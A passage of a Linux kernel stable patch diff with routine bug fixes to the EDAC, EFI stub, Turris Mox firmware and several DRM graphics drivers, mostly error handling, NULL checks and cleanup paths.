++EXPORT_SYMBOL_GPL(skx_get_node_id);
+ 
+ static int get_width(u32 mtr)
+ {
+@@ -284,6 +290,7 @@ int skx_get_all_bus_mappings(struct res_config *cfg, struct list_head **list)
+ 		*list = &dev_edac_list;
+ 	return ndev;
+ }
++EXPORT_SYMBOL_GPL(skx_get_all_bus_mappings);
+ 
+ int skx_get_hi_lo(unsigned int did, int off[], u64 *tolm, u64 *tohm)
+ {
+@@ -323,6 +330,7 @@ int skx_get_hi_lo(unsigned int did, int off[], u64 *tolm, u64 *tohm)
+ 	pci_dev_put(pdev);
+ 	return -ENODEV;
+ }
++EXPORT_SYMBOL_GPL(skx_get_hi_lo);
+ 
+ static int skx_get_dimm_attr(u32 reg, int lobit, int hibit, int add,
+ 			     int minval, int maxval, const char *name)
+@@ -394,6 +402,7 @@ int skx_get_dimm_info(u32 mtr, u32 mcmtr, u32 amap, struct dimm_info *dimm,
+ 
+ 	return 1;
+ }
++EXPORT_SYMBOL_GPL(skx_get_dimm_info);
+ 
+ int skx_get_nvdimm_info(struct dimm_info *dimm, struct skx_imc *imc,
+ 			int chan, int dimmno, const char *mod_str)
+@@ -442,6 +451,7 @@ int skx_get_nvdimm_info(struct dimm_info *dimm, struct skx_imc *imc,
+ 
+ 	return (size == 0 || size == ~0ull) ? 0 : 1;
+ }
++EXPORT_SYMBOL_GPL(skx_get_nvdimm_info);
+ 
+ int skx_register_mci(struct skx_imc *imc, struct pci_dev *pdev,
+ 		     const char *ctl_name, const char *mod_str,
+@@ -512,6 +522,7 @@ int skx_register_mci(struct skx_imc *imc, struct pci_dev *pdev,
+ 	imc->mci = NULL;
+ 	return rc;
+ }
++EXPORT_SYMBOL_GPL(skx_register_mci);
+ 
+ static void skx_unregister_mci(struct skx_imc *imc)
+ {
+@@ -694,6 +705,7 @@ int skx_mce_check_error(struct notifier_block *nb, unsigned long val,
+ 	mce->kflags |= MCE_HANDLED_EDAC;
+ 	return NOTIFY_DONE;
+ }
++EXPORT_SYMBOL_GPL(skx_mce_check_error);
+ 
+ void skx_remove(void)
+ {
+@@ -731,3 +743,8 @@ void skx_remove(void)
+ 		kfree(d);
+ 	}
+ }
++EXPORT_SYMBOL_GPL(skx_remove);
++
++MODULE_LICENSE("GPL v2");
++MODULE_AUTHOR("Tony Luck");
++MODULE_DESCRIPTION("MC Driver for Intel server processors");
+diff --git a/drivers/edac/skx_common.h b/drivers/edac/skx_common.h
+index 0cbadd3d2cd39..c0c174c101d2c 100644
+--- a/drivers/edac/skx_common.h
++++ b/drivers/edac/skx_common.h
+@@ -178,8 +178,8 @@ typedef int (*get_dimm_config_f)(struct mem_ctl_info *mci,
+ typedef bool (*skx_decode_f)(struct decoded_addr *res);
+ typedef void (*skx_show_retry_log_f)(struct decoded_addr *res, char *msg, int len, bool scrub_err);
+ 
+-int __init skx_adxl_get(void);
+-void __exit skx_adxl_put(void);
++int skx_adxl_get(void);
++void skx_adxl_put(void);
+ void skx_set_decode(skx_decode_f decode, skx_show_retry_log_f show_retry_log);
+ void skx_set_mem_cfg(bool mem_cfg_2lm);
+ 
+diff --git a/drivers/firmware/efi/libstub/x86-stub.c b/drivers/firmware/efi/libstub/x86-stub.c
+index f7eb389aeec06..b8246fc7f4122 100644
+--- a/drivers/firmware/efi/libstub/x86-stub.c
++++ b/drivers/firmware/efi/libstub/x86-stub.c
+@@ -435,11 +435,12 @@ void __noreturn efi_stub_entry(efi_handle_t handle,
+ efi_status_t __efiapi efi_pe_entry(efi_handle_t handle,
+ 				   efi_system_table_t *sys_table_arg)
+ {
+-	static struct boot_params boot_params __page_aligned_bss;
+-	struct setup_header *hdr = &boot_params.hdr;
+ 	efi_guid_t proto = LOADED_IMAGE_PROTOCOL_GUID;
++	struct boot_params *boot_params;
++	struct setup_header *hdr;
+ 	int options_size = 0;
+ 	efi_status_t status;
++	unsigned long alloc;
+ 	char *cmdline_ptr;
+ 
+ 	if (efi_is_native())
+@@ -457,6 +458,13 @@ efi_status_t __efiapi efi_pe_entry(efi_handle_t handle,
+ 		efi_exit(handle, status);
+ 	}
+ 
++	status = efi_allocate_pages(PARAM_SIZE, &alloc, ULONG_MAX);
++	if (status != EFI_SUCCESS)
++		efi_exit(handle, status);
++
++	boot_params = memset((void *)alloc, 0x0, PARAM_SIZE);
++	hdr	    = &boot_params->hdr;
++
+ 	/* Assign the setup_header fields that the kernel actually cares about */
+ 	hdr->root_flags	= 1;
+ 	hdr->vid_mode	= 0xffff;
+@@ -466,17 +474,16 @@ efi_status_t __efiapi efi_pe_entry(efi_handle_t handle,
+ 
+ 	/* Convert unicode cmdline to ascii */
+ 	cmdline_ptr = efi_convert_cmdline(image, &options_size);
+-	if (!cmdline_ptr)
+-		goto fail;
++	if (!cmdline_ptr) {
++		efi_free(PARAM_SIZE, alloc);
++		efi_exit(handle, EFI_OUT_OF_RESOURCES);
++	}
+ 
+ 	efi_set_u64_split((unsigned long)cmdline_ptr, &hdr->cmd_line_ptr,
+-			  &boot_params.ext_cmd_line_ptr);
++			  &boot_params->ext_cmd_line_ptr);
+ 
+-	efi_stub_entry(handle, sys_table_arg, &boot_params);
++	efi_stub_entry(handle, sys_table_arg, boot_params);
+ 	/* not reached */
+-
+-fail:
+-	efi_exit(handle, status);
+ }
+ 
+ static void add_e820ext(struct boot_params *params,
+diff --git a/drivers/firmware/turris-mox-rwtm.c b/drivers/firmware/turris-mox-rwtm.c
+index c2d34dc8ba462..c3d49fcc53305 100644
+--- a/drivers/firmware/turris-mox-rwtm.c
++++ b/drivers/firmware/turris-mox-rwtm.c
+@@ -2,7 +2,7 @@
+ /*
+  * Turris Mox rWTM firmware driver
+  *
+- * Copyright (C) 2019 Marek Behún <kabel@kernel.org>
++ * Copyright (C) 2019, 2024 Marek Behún <kabel@kernel.org>
+  */
+ 
+ #include <linux/armada-37xx-rwtm-mailbox.h>
+@@ -174,6 +174,9 @@ static void mox_rwtm_rx_callback(struct mbox_client *cl, void *data)
+ 	struct mox_rwtm *rwtm = dev_get_drvdata(cl->dev);
+ 	struct armada_37xx_rwtm_rx_msg *msg = data;
+ 
++	if (completion_done(&rwtm->cmd_done))
++		return;
++
+ 	rwtm->reply = *msg;
+ 	complete(&rwtm->cmd_done);
+ }
+@@ -199,9 +202,8 @@ static int mox_get_board_info(struct mox_rwtm *rwtm)
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	ret = wait_for_completion_timeout(&rwtm->cmd_done, HZ / 2);
+-	if (ret < 0)
+-		return ret;
++	if (!wait_for_completion_timeout(&rwtm->cmd_done, HZ / 2))
++		return -ETIMEDOUT;
+ 
+ 	ret = mox_get_status(MBOX_CMD_BOARD_INFO, reply->retval);
+ 	if (ret == -ENODATA) {
+@@ -235,9 +237,8 @@ static int mox_get_board_info(struct mox_rwtm *rwtm)
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	ret = wait_for_completion_timeout(&rwtm->cmd_done, HZ / 2);
+-	if (ret < 0)
+-		return ret;
++	if (!wait_for_completion_timeout(&rwtm->cmd_done, HZ / 2))
++		return -ETIMEDOUT;
+ 
+ 	ret = mox_get_status(MBOX_CMD_ECDSA_PUB_KEY, reply->retval);
+ 	if (ret == -ENODATA) {
+@@ -274,9 +275,8 @@ static int check_get_random_support(struct mox_rwtm *rwtm)
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	ret = wait_for_completion_timeout(&rwtm->cmd_done, HZ / 2);
+-	if (ret < 0)
+-		return ret;
++	if (!wait_for_completion_timeout(&rwtm->cmd_done, HZ / 2))
++		return -ETIMEDOUT;
+ 
+ 	return mox_get_status(MBOX_CMD_GET_RANDOM, rwtm->reply.retval);
+ }
+@@ -499,6 +499,7 @@ static int turris_mox_rwtm_probe(struct platform_device *pdev)
+ 	platform_set_drvdata(pdev, rwtm);
+ 
+ 	mutex_init(&rwtm->busy);
++	init_completion(&rwtm->cmd_done);
+ 
+ 	rwtm->mbox_client.dev = dev;
+ 	rwtm->mbox_client.rx_callback = mox_rwtm_rx_callback;
+@@ -512,8 +513,6 @@ static int turris_mox_rwtm_probe(struct platform_device *pdev)
+ 		goto remove_files;
+ 	}
+ 
+-	init_completion(&rwtm->cmd_done);
+-
+ 	ret = mox_get_board_info(rwtm);
+ 	if (ret < 0)
+ 		dev_warn(dev, "Cannot read board information: %i\n", ret);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 157441dd07041..d4faa489bd5fa 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -5815,7 +5815,7 @@ int amdgpu_device_baco_exit(struct drm_device *dev)
+ 	    adev->nbio.funcs->enable_doorbell_interrupt)
+ 		adev->nbio.funcs->enable_doorbell_interrupt(adev, true);
+ 
+-	if (amdgpu_passthrough(adev) &&
++	if (amdgpu_passthrough(adev) && adev->nbio.funcs &&
+ 	    adev->nbio.funcs->clear_doorbell_interrupt)
+ 		adev->nbio.funcs->clear_doorbell_interrupt(adev);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
+index ea0fb079f942a..fd98d2508a22a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
+@@ -583,7 +583,6 @@ void amdgpu_gmc_noretry_set(struct amdgpu_device *adev)
+ 	struct amdgpu_gmc *gmc = &adev->gmc;
+ 	uint32_t gc_ver = adev->ip_versions[GC_HWIP][0];
+ 	bool noretry_default = (gc_ver == IP_VERSION(9, 0, 1) ||
+-				gc_ver == IP_VERSION(9, 3, 0) ||
+ 				gc_ver == IP_VERSION(9, 4, 0) ||
+ 				gc_ver == IP_VERSION(9, 4, 1) ||
+ 				gc_ver == IP_VERSION(9, 4, 2) ||
+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c b/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
+index c7af36370b0de..38f57455bc747 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
+@@ -241,6 +241,14 @@ static void sdma_v5_2_ring_set_wptr(struct amdgpu_ring *ring)
+ 		DRM_DEBUG("calling WDOORBELL64(0x%08x, 0x%016llx)\n",
+ 				ring->doorbell_index, ring->wptr << 2);
+ 		WDOORBELL64(ring->doorbell_index, ring->wptr << 2);
++		/* SDMA seems to miss doorbells sometimes when powergating kicks in.
++		 * Updating the wptr directly will wake it. This is only safe because
++		 * we disallow gfxoff in begin_use() and then allow it again in end_use().
++		 */
++		WREG32(sdma_v5_2_get_reg_offset(adev, ring->me, mmSDMA0_GFX_RB_WPTR),
++		       lower_32_bits(ring->wptr << 2));
++		WREG32(sdma_v5_2_get_reg_offset(adev, ring->me, mmSDMA0_GFX_RB_WPTR_HI),
++		       upper_32_bits(ring->wptr << 2));
+ 	} else {
+ 		DRM_DEBUG("Not using doorbell -- "
+ 				"mmSDMA%i_GFX_RB_WPTR == 0x%08x "
+@@ -1705,6 +1713,10 @@ static void sdma_v5_2_ring_begin_use(struct amdgpu_ring *ring)
+ 	 * but it shouldn't hurt for other parts since
+ 	 * this GFXOFF will be disallowed anyway when SDMA is
+ 	 * active, this just makes it explicit.
++	 * sdma_v5_2_ring_set_wptr() takes advantage of this
++	 * to update the wptr because sometimes SDMA seems to miss
++	 * doorbells when entering PG.  If you remove this, update
++	 * sdma_v5_2_ring_set_wptr() as well!
+ 	 */
+ 	amdgpu_gfx_off_ctrl(adev, false);
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_surface.c b/drivers/gpu/drm/amd/display/dc/core/dc_surface.c
+index a80e45300783c..f4f3ca7aad60e 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_surface.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_surface.c
+@@ -154,7 +154,8 @@ const struct dc_plane_status *dc_plane_get_status(
+ 		if (pipe_ctx->plane_state != plane_state)
+ 			continue;
+ 
+-		pipe_ctx->plane_state->status.is_flip_pending = false;
++		if (pipe_ctx->plane_state)
++			pipe_ctx->plane_state->status.is_flip_pending = false;
+ 
+ 		break;
+ 	}
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index f3257cf4b06f2..3aab1caed2ac7 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -79,8 +79,8 @@ MODULE_FIRMWARE("amdgpu/smu_13_0_10.bin");
+ #define PCIE_LC_LINK_WIDTH_CNTL__LC_LINK_WIDTH_RD_MASK 0x00000070L
+ #define PCIE_LC_LINK_WIDTH_CNTL__LC_LINK_WIDTH_RD__SHIFT 0x4
+ #define smnPCIE_LC_SPEED_CNTL			0x11140290
+-#define PCIE_LC_SPEED_CNTL__LC_CURRENT_DATA_RATE_MASK 0xC000
+-#define PCIE_LC_SPEED_CNTL__LC_CURRENT_DATA_RATE__SHIFT 0xE
++#define PCIE_LC_SPEED_CNTL__LC_CURRENT_DATA_RATE_MASK 0xE0
++#define PCIE_LC_SPEED_CNTL__LC_CURRENT_DATA_RATE__SHIFT 0x5
+ 
+ static const int link_width[] = {0, 1, 2, 4, 8, 12, 16};
+ static const int link_speed[] = {25, 50, 80, 160};
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index 72b2b171e533e..805f8455b8d64 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -2923,7 +2923,7 @@ static int drm_dp_send_link_address(struct drm_dp_mst_topology_mgr *mgr,
+ 
+ 	/* FIXME: Actually do some real error handling here */
+ 	ret = drm_dp_mst_wait_tx_reply(mstb, txmsg);
+-	if (ret <= 0) {
++	if (ret < 0) {
+ 		drm_err(mgr->dev, "Sending link address failed with %d\n", ret);
+ 		goto out;
+ 	}
+@@ -2975,7 +2975,7 @@ static int drm_dp_send_link_address(struct drm_dp_mst_topology_mgr *mgr,
+ 	mutex_unlock(&mgr->lock);
+ 
+ out:
+-	if (ret <= 0)
++	if (ret < 0)
+ 		mstb->link_address_sent = false;
+ 	kfree(txmsg);
+ 	return ret < 0 ? ret : changed;
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_gem.c b/drivers/gpu/drm/etnaviv/etnaviv_gem.c
+index 5cf13e52f7c94..23d5058eca8d8 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_gem.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_gem.c
+@@ -355,9 +355,11 @@ static void *etnaviv_gem_vmap_impl(struct etnaviv_gem_object *obj)
+ 
+ static inline enum dma_data_direction etnaviv_op_to_dma_dir(u32 op)
+ {
+-	if (op & ETNA_PREP_READ)
++	op &= ETNA_PREP_READ | ETNA_PREP_WRITE;
++
++	if (op == ETNA_PREP_READ)
+ 		return DMA_FROM_DEVICE;
+-	else if (op & ETNA_PREP_WRITE)
++	else if (op == ETNA_PREP_WRITE)
+ 		return DMA_TO_DEVICE;
+ 	else
+ 		return DMA_BIDIRECTIONAL;
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_sched.c b/drivers/gpu/drm/etnaviv/etnaviv_sched.c
+index 72e2553fbc984..5d506767b8f24 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_sched.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_sched.c
+@@ -38,9 +38,6 @@ static enum drm_gpu_sched_stat etnaviv_sched_timedout_job(struct drm_sched_job
+ 	u32 dma_addr;
+ 	int change;
+ 
+-	/* block scheduler */
+-	drm_sched_stop(&gpu->sched, sched_job);
+-
+ 	/*
+ 	 * If the GPU managed to complete this jobs fence, the timout is
+ 	 * spurious. Bail out.
+@@ -62,6 +59,9 @@ static enum drm_gpu_sched_stat etnaviv_sched_timedout_job(struct drm_sched_job
+ 		goto out_no_timeout;
+ 	}
+ 
++	/* block scheduler */
++	drm_sched_stop(&gpu->sched, sched_job);
++
+ 	if(sched_job)
+ 		drm_sched_increase_karma(sched_job);
+ 
+@@ -75,8 +75,7 @@ static enum drm_gpu_sched_stat etnaviv_sched_timedout_job(struct drm_sched_job
+ 	return DRM_GPU_SCHED_STAT_NOMINAL;
+ 
+ out_no_timeout:
+-	/* restart scheduler after GPU is usable again */
+-	drm_sched_start(&gpu->sched, true);
++	list_add(&sched_job->list, &sched_job->sched->pending_list);
+ 	return DRM_GPU_SCHED_STAT_NOMINAL;
+ }
+ 
+diff --git a/drivers/gpu/drm/gma500/cdv_intel_lvds.c b/drivers/gpu/drm/gma500/cdv_intel_lvds.c
+index be6efcaaa3b3f..c9ad16960e82b 100644
+--- a/drivers/gpu/drm/gma500/cdv_intel_lvds.c
++++ b/drivers/gpu/drm/gma500/cdv_intel_lvds.c
+@@ -309,6 +309,9 @@ static int cdv_intel_lvds_get_modes(struct drm_connector *connector)
+ 	if (mode_dev->panel_fixed_mode != NULL) {
+ 		struct drm_display_mode *mode =
+ 		    drm_mode_duplicate(dev, mode_dev->panel_fixed_mode);
++		if (!mode)
++			return 0;
++
+ 		drm_mode_probed_add(connector, mode);
+ 		return 1;
+ 	}
+diff --git a/drivers/gpu/drm/gma500/psb_intel_lvds.c b/drivers/gpu/drm/gma500/psb_intel_lvds.c
+index 7ee6c8ce103b8..9842de0dad3af 100644
+--- a/drivers/gpu/drm/gma500/psb_intel_lvds.c
++++ b/drivers/gpu/drm/gma500/psb_intel_lvds.c
+@@ -502,6 +502,9 @@ static int psb_intel_lvds_get_modes(struct drm_connector *connector)
+ 	if (mode_dev->panel_fixed_mode != NULL) {
+ 		struct drm_display_mode *mode =
+ 		    drm_mode_duplicate(dev, mode_dev->panel_fixed_mode);
++		if (!mode)
++			return 0;
++
+ 		drm_mode_probed_add(connector, mode);
+ 		return 1;
+ 	}
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index a27563bfd9097..3f65d890b8a90 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -4089,6 +4089,8 @@ int intel_dp_retrain_link(struct intel_encoder *encoder,
+ 		    !intel_dp_mst_is_master_trans(crtc_state))
+ 			continue;
+ 
++		intel_dp->link_trained = false;
++
+ 		intel_dp_check_frl_training(intel_dp);
+ 		intel_dp_pcon_dsc_configure(intel_dp, crtc_state);
+ 		intel_dp_start_link_train(intel_dp, crtc_state);
+diff --git a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+index eae138b9f2df3..321dbecba0f3c 100644
+--- a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
++++ b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+@@ -3313,11 +3313,7 @@ static void remove_from_engine(struct i915_request *rq)
+ 
+ static bool can_preempt(struct intel_engine_cs *engine)
+ {
+-	if (GRAPHICS_VER(engine->i915) > 8)
+-		return true;
+-
+-	/* GPGPU on bdw requires extra w/a; not implemented */
+-	return engine->class != RENDER_CLASS;
++	return GRAPHICS_VER(engine->i915) > 8;
+ }
+ 
+ static void kick_execlists(const struct i915_request *rq, int prio)
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_drv.c b/drivers/gpu/drm/mediatek/mtk_drm_drv.c
+index 25639fbfd374a..905275df09800 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_drv.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_drv.c
+@@ -598,6 +598,8 @@ static const struct of_device_id mtk_ddp_comp_dt_ids[] = {
+ 	  .data = (void *)MTK_DISP_OVL },
+ 	{ .compatible = "mediatek,mt8192-disp-ovl",
+ 	  .data = (void *)MTK_DISP_OVL },
++	{ .compatible = "mediatek,mt8195-disp-ovl",
++	  .data = (void *)MTK_DISP_OVL },
+ 	{ .compatible = "mediatek,mt8183-disp-ovl-2l",
+ 	  .data = (void *)MTK_DISP_OVL_2L },
+ 	{ .compatible = "mediatek,mt8192-disp-ovl-2l",
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_plane.c b/drivers/gpu/drm/mediatek/mtk_drm_plane.c
+index c4a0203d17e38..30d361671aa9c 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_plane.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_plane.c
+@@ -157,6 +157,8 @@ static void mtk_plane_atomic_async_update(struct drm_plane *plane,
+ 	plane->state->src_y = new_state->src_y;
+ 	plane->state->src_h = new_state->src_h;
+ 	plane->state->src_w = new_state->src_w;
++	plane->state->dst.x1 = new_state->dst.x1;
++	plane->state->dst.y1 = new_state->dst.y1;
+ 
+ 	mtk_plane_update_new_state(new_state, new_plane_state);
+ 	swap(plane->state->fb, new_state->fb);
+diff --git a/drivers/gpu/drm/meson/meson_drv.c b/drivers/gpu/drm/meson/meson_drv.c
+index fbac39aa38cc4..f0df41cf39a36 100644
+--- a/drivers/gpu/drm/meson/meson_drv.c
++++ b/drivers/gpu/drm/meson/meson_drv.c
+@@ -249,29 +249,20 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 	if (ret)
+ 		goto free_drm;
+ 	ret = meson_canvas_alloc(priv->canvas, &priv->canvas_id_vd1_0);
+-	if (ret) {
+-		meson_canvas_free(priv->canvas, priv->canvas_id_osd1);
+-		goto free_drm;
+-	}
++	if (ret)
++		goto free_canvas_osd1;
+ 	ret = meson_canvas_alloc(priv->canvas, &priv->canvas_id_vd1_1);
+-	if (ret) {
+-		meson_canvas_free(priv->canvas, priv->canvas_id_osd1);
+-		meson_canvas_free(priv->canvas, priv->canvas_id_vd1_0);
+-		goto free_drm;
+-	}
++	if (ret)
++		goto free_canvas_vd1_0;
+ 	ret = meson_canvas_alloc(priv->canvas, &priv->canvas_id_vd1_2);
+-	if (ret) {
+-		meson_canvas_free(priv->canvas, priv->canvas_id_osd1);
+-		meson_canvas_free(priv->canvas, priv->canvas_id_vd1_0);
+-		meson_canvas_free(priv->canvas, priv->canvas_id_vd1_1);
+-		goto free_drm;
+-	}
++	if (ret)
++		goto free_canvas_vd1_1;
+ 
+ 	priv->vsync_irq = platform_get_irq(pdev, 0);
+ 
+ 	ret = drm_vblank_init(drm, 1);
+ 	if (ret)
+-		goto free_drm;
++		goto free_canvas_vd1_2;
+ 
+ 	/* Assign limits per soc revision/package */
+ 	for (i = 0 ; i < ARRAY_SIZE(meson_drm_soc_attrs) ; ++i) {
+@@ -287,11 +278,11 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 	 */
+ 	ret = drm_aperture_remove_framebuffers(&meson_driver);
+ 	if (ret)
+-		goto free_drm;
++		goto free_canvas_vd1_2;
+ 
+ 	ret = drmm_mode_config_init(drm);
+ 	if (ret)
+-		goto free_drm;
++		goto free_canvas_vd1_2;
+ 	drm->mode_config.max_width = 3840;
+ 	drm->mode_config.max_height = 2160;
+ 	drm->mode_config.funcs = &meson_mode_config_funcs;
+@@ -306,7 +297,7 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 	if (priv->afbcd.ops) {
+ 		ret = priv->afbcd.ops->init(priv);
+ 		if (ret)
+-			goto free_drm;
++			goto free_canvas_vd1_2;
+ 	}
+ 
+ 	/* Encoder Initialization */
+@@ -364,6 +355,14 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ exit_afbcd:
+ 	if (priv->afbcd.ops)
+ 		priv->afbcd.ops->exit(priv);
++free_canvas_vd1_2:
++	meson_canvas_free(priv->canvas, priv->canvas_id_vd1_2);
++free_canvas_vd1_1:
++	meson_canvas_free(priv->canvas, priv->canvas_id_vd1_1);
++free_canvas_vd1_0:
++	meson_canvas_free(priv->canvas, priv->canvas_id_vd1_0);
++free_canvas_osd1:
++	meson_canvas_free(priv->canvas, priv->canvas_id_osd1);
+ free_drm:
+ 	drm_dev_put(drm);
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+index 3632f0768aa9e..1bf41a82cd0f9 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+@@ -1653,8 +1653,7 @@ void dpu_encoder_trigger_kickoff_pending(struct drm_encoder *drm_enc)
+ 		phys = dpu_enc->phys_encs[i];
+ 
+ 		ctl = phys->hw_ctl;
+-		if (ctl->ops.clear_pending_flush)
+-			ctl->ops.clear_pending_flush(ctl);
++		ctl->ops.clear_pending_flush(ctl);
+ 
+ 		/* update only for command mode primary ctl */
+ 		if ((phys == dpu_enc->cur_master) &&
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
+index 42c7e378d504d..05a09d86e1838 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
+@@ -548,8 +548,7 @@ static void dpu_encoder_phys_wb_disable(struct dpu_encoder_phys *phys_enc)
+ 	}
+ 
+ 	/* reset h/w before final flush */
+-	if (phys_enc->hw_ctl->ops.clear_pending_flush)
+-		phys_enc->hw_ctl->ops.clear_pending_flush(phys_enc->hw_ctl);
++	phys_enc->hw_ctl->ops.clear_pending_flush(phys_enc->hw_ctl);
+ 
+ 	/*
+ 	 * New CTL reset sequence from 5.0 MDP onwards.
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_ctl.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_ctl.h
+index 96c012ec84676..ec5265771cdf7 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_ctl.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_ctl.h
+@@ -81,7 +81,8 @@ struct dpu_hw_ctl_ops {
+ 
+ 	/**
+ 	 * Clear the value of the cached pending_flush_mask
+-	 * No effect on hardware
++	 * No effect on hardware.
++	 * Required to be implemented.
+ 	 * @ctx       : ctl path ctx pointer
+ 	 */
+ 	void (*clear_pending_flush)(struct dpu_hw_ctl *ctx);
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_host.c b/drivers/gpu/drm/msm/dsi/dsi_host.c
+index cd9ca36901611..034ad810fd653 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_host.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_host.c
+@@ -848,6 +848,7 @@ static void dsi_update_dsc_timing(struct msm_dsi_host *msm_host, bool is_cmd_mod
+ 	u32 slice_per_intf, total_bytes_per_intf;
+ 	u32 pkt_per_line;
+ 	u32 eol_byte_num;
++	u32 bytes_per_pkt;
+ 
+ 	/* first calculate dsc parameters and then program
+ 	 * compress mode registers
+@@ -855,6 +856,7 @@ static void dsi_update_dsc_timing(struct msm_dsi_host *msm_host, bool is_cmd_mod
+ 	slice_per_intf = DIV_ROUND_UP(hdisplay, dsc->slice_width);
+ 
+ 	total_bytes_per_intf = dsc->slice_chunk_size * slice_per_intf;
++	bytes_per_pkt = dsc->slice_chunk_size; /* * slice_per_pkt; */
+ 
+ 	eol_byte_num = total_bytes_per_intf % 3;
+ 
+@@ -892,6 +894,7 @@ static void dsi_update_dsc_timing(struct msm_dsi_host *msm_host, bool is_cmd_mod
+ 		dsi_write(msm_host, REG_DSI_COMMAND_COMPRESSION_MODE_CTRL, reg_ctrl);
+ 		dsi_write(msm_host, REG_DSI_COMMAND_COMPRESSION_MODE_CTRL2, reg_ctrl2);
+ 	} else {
++		reg |= DSI_VIDEO_COMPRESSION_MODE_CTRL_WC(bytes_per_pkt);
+ 		dsi_write(msm_host, REG_DSI_VIDEO_COMPRESSION_MODE_CTRL, reg);
+ 	}
+ }
+diff --git a/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c b/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
+index 1c008bd9102ff..820d8d29b62bd 100644
+--- a/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
++++ b/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
+@@ -1271,7 +1271,11 @@ static int boe_panel_prepare(struct drm_panel *panel)
+ 	usleep_range(10000, 11000);
+ 
+ 	if (boe->desc->lp11_before_reset) {
+-		mipi_dsi_dcs_nop(boe->dsi);
++		ret = mipi_dsi_dcs_nop(boe->dsi);
++		if (ret < 0) {
++			dev_err(&boe->dsi->dev, "Failed to send NOP: %d\n", ret);
++			goto poweroff;
++		}
+ 		usleep_range(1000, 2000);
+ 	}
+ 	gpiod_set_value(boe->enable_gpio, 1);
+@@ -1292,13 +1296,13 @@ static int boe_panel_prepare(struct drm_panel *panel)
+ 	return 0;
+ 
+ poweroff:
++	gpiod_set_value(boe->enable_gpio, 0);
+ 	regulator_disable(boe->avee);
+ poweroffavdd:
+ 	regulator_disable(boe->avdd);
+ poweroff1v8:
+ 	usleep_range(5000, 7000);
+ 	regulator_disable(boe->pp1800);
+-	gpiod_set_value(boe->enable_gpio, 0);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/panfrost/panfrost_drv.c b/drivers/gpu/drm/panfrost/panfrost_drv.c
